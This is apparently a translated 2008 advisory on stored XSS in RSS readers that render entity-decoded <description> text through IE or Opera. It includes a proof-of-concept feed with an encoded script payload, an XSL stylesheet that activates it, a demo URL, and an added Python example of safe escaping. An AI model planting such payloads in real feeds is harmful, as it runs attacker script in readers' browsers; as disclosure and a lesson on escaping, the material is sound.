Affected systems:
RSS readers that hand the feed to one of the following rendering engines:
Internet Explorer <= IE7 (other versions were not tested, but are presumably affected as well)
Opera <= 9.52
Readers confirmed vulnerable:
Sina Diantong 1.1.0.8 (latest version at the time of writing)
Zhoubotong 4.0 (28031409) (latest version at the time of writing)
Maxthon (Aoyou) 2.1.4.443 (latest version at the time of writing), RSS sidebar
... the list is not exhaustive.
Unaffected:
Google Reader, because it does not hand the <description> content to the IE engine; it parses the content itself and emits its own HTML.
Description:
IE and Opera treat the text of an <item>'s <description> element in an RSS feed as follows: the entity-encoded content is first decoded (for example, '&lt;' becomes '<') and the resulting HTML is then rendered, scripts included.
Note that the decoding is done by the XML parser itself, because &lt; and &gt; are the standard XML entities: by the time the reader holds the description string, it already contains a literal <script> tag. A reader that then passes that string to the engine as HTML (for instance through an XSLT disable-output-escaping="yes", or an innerHTML assignment) executes it.
Because of this, some RSS readers fail to filter the payload (their checks only ever see the encoded form in the feed), and the result is an XSS vulnerability in the reader.
Source: kxlzx (kxlzx@xiaotou.org) http://www.inbreak.net/
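As an added illustration (this is not part of the original advisory and not code from any of the readers named above), the following Python script parses a constructed feed carrying the PoC payload, shows that the XML parser has already turned &lt;script&gt; into a literal tag, and contrasts the unsafe rendering path (the equivalent of the stylesheet's disable-output-escaping="yes") with two escaped alternatives. The feed contents, the function names and the tag-matching regex are assumptions made for this example.

```python
import html
import re
import xml.etree.ElementTree as ET

# Constructed feed modelled on the PoC: the payload is entity-encoded inside
# <description>, exactly as a hostile publisher would ship it. (Sample data,
# not taken from any real feed.)
FEED = b"""<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>example feed</title>
    <item>
      <title>first item</title>
      <description>&lt;script&gt;alert('xss');&lt;/script&gt; plain text</description>
    </item>
  </channel>
</rss>
"""

# Crude tag matcher, used only for the plain-text rendering path and the
# detection check below; it is not an HTML sanitizer.
TAG_RE = re.compile(r"<[^>]*>")


def item_descriptions(feed_bytes):
    """Return the text content of every <item><description>.

    The XML parser decodes the &lt; / &gt; entities, so what comes back is
    already literal markup: "<script>alert('xss');</script> plain text".
    A filter that searches the raw feed bytes for '<script>' never sees it.
    """
    root = ET.fromstring(feed_bytes)
    return [(d.text or "") for d in root.iterfind("./channel/item/description")]


def render_unsafe(description):
    """Mirror of disable-output-escaping="yes" / innerHTML: the decoded text
    is spliced into the page as markup, so the <script> element is live."""
    return '<p class="itemcontent">%s</p>' % description


def render_escaped(description):
    """Safe: re-escape before insertion, so the engine displays the tags as
    text (what xsl:value-of does when output escaping is left enabled)."""
    return '<p class="itemcontent">%s</p>' % html.escape(description, quote=True)


def render_stripped(description):
    """Alternative for readers that want plain text only: drop every tag and
    escape what is left. Stripping alone is not enough ('a < b' still needs
    escaping), hence the html.escape on the result."""
    return '<p class="itemcontent">%s</p>' % html.escape(TAG_RE.sub("", description))


def contains_markup(description):
    """Detection check: does a decoded description carry any markup at all?
    Useful for flagging feeds before they reach the rendering engine."""
    return TAG_RE.search(description) is not None


if __name__ == "__main__":
    for d in item_descriptions(FEED):
        print("decoded text :", d)
        print("markup?      :", contains_markup(d))
        print("unsafe       :", render_unsafe(d))
        print("escaped      :", render_escaped(d))
        print("stripped     :", render_stripped(d))
```

The unsafe path is exactly what the PoC stylesheet does with disable-output-escaping="yes"; the escaped path is the minimal fix for a reader that only needs to show text. A reader that wants to keep publisher HTML (links, images) needs an allowlist-based sanitizer on the decoded string rather than the regex above.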
Test method:
Put entity-encoded JavaScript in the content of the <description> element, for example:
rss.xml:
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="kxlzx.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1"
     xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:content="http://purl.org/rss/1.0/modules/content"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback"
     version="2.0">
  <channel>
    <update>Mon, 26 Oct 2008 10:36:52 +0800</update>
    <title>hacked by kxlzx</title>
    <description>hacked by kxlzx</description>
    <item>
      <title>hacked by kxlzx title</title>
      <author xmlns="http://www.w3.org/2005/Atom">
        <name>test all</name>
      </author>
      <id xmlns="http://www.w3.org/2005/Atom">http://www.inbreak.net/</id>
      <!-- the payload: the XML parser decodes &lt; and &gt;, leaving a literal <script> element in the text -->
      <description>&lt;script&gt;alert('xss');&lt;/script&gt;</description>
      <pubDate>Mon, 27 Oct 2008 09:34:54 +0800</pubDate>
    </item>
  </channel>
</rss>
kxlzx.xsl:
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:output method="html" indent="yes" doctype-system="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" doctype-public="-//W3C//DTD XHTML 1.0 Transitional//EN"/>
  <xsl:variable name="title" select="/rss/channel/title"/>
  <xsl:variable name="feedUrl" select="/rss/channel/atom:link[@rel='self']/@href" xmlns:atom="http://www.w3.org/2005/Atom"/>
  <xsl:variable name="srclink" select="/rss/channel/link"/>
  <xsl:template match="/">
    <html>
      <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
      </head>
      <xsl:apply-templates select="rss/channel"/>
    </html>
  </xsl:template>
  <xsl:template match="channel">
    <body>
      <div id="wrapper">
        <div id="content">
          <xsl:apply-templates select="image"/>
          <h1><a href="{link}" style="color: #94B3C5;"><xsl:value-of select="$title"/></a></h1>
          <p id="desc"><xsl:value-of select="description" disable-output-escaping="yes"/></p>
          <ul id="item" class="item">
            <xsl:apply-templates select="item"/>
          </ul>
        </div>
      </div>
    </body>
  </xsl:template>
  <xsl:template match="item">
    <li>
      <h2><a href="{link}"><xsl:value-of select="title"/></a></h2>
      <span class="date"><xsl:value-of select="pubDate"/></span>
      <!-- the item description is emitted here; see outputContent below -->
      <p name="decodeable" class="itemcontent"><xsl:call-template name="outputContent"/></p>
      <xsl:if test="count(child::enclosure) = 1">
        <dd>
          <a href="{enclosure/@url}">
          </a>
        </dd>
      </xsl:if>
    </li>
  </xsl:template>
  <xsl:template match="image">
    <xsl:element name="img" namespace="http://www.w3.org/1999/xhtml">
      <xsl:attribute name="src"><xsl:value-of select="url"/></xsl:attribute>
      <xsl:attribute name="alt">Link to <xsl:value-of select="title"/></xsl:attribute>
      <xsl:attribute name="id">feedimage</xsl:attribute>
    </xsl:element>
    <xsl:text> </xsl:text>
  </xsl:template>
  <xsl:template match="feedsky:browserFriendly" xmlns:feedsky="http://namespace.org/feedsky/ext/1.0">
    <p id="ownerblurb" xmlns="http://www.w3.org/1999/xhtml">
      <em>A message from the feed publisher:</em>
      <xsl:text> </xsl:text>
      <xsl:apply-templates/>
    </p>
  </xsl:template>
  <xsl:template name="outputContent">
    <xsl:choose>
      <xsl:when test="xhtml:body" xmlns:xhtml="http://www.w3.org/1999/xhtml">
        <xsl:copy-of select="xhtml:body/*"/>
      </xsl:when>
      <xsl:when test="xhtml:div" xmlns:xhtml="http://www.w3.org/1999/xhtml">
        <xsl:copy-of select="xhtml:div"/>
      </xsl:when>
      <xsl:when test="content:encoded" xmlns:content="http://purl.org/rss/1.0/modules/content/">
        <xsl:value-of select="content:encoded" disable-output-escaping="yes"/>
      </xsl:when>
      <xsl:when test="description">
        <!-- disable-output-escaping hands the already-decoded description text to the engine as raw HTML: this is where the payload becomes live markup -->
        <xsl:value-of select="description" disable-output-escaping="yes"/>
      </xsl:when>
    </xsl:choose>
  </xsl:template>
</xsl:stylesheet>
Demo address:
http://www.inbreak.net/kxlzxtest/rss8.xml
Subscribe to this address with an RSS reader.
Suggestion:
I have no suggestions. I pray that the RSS reader vendors have upgraded.
Link: http://www.inbreak.net/?action=show&id=132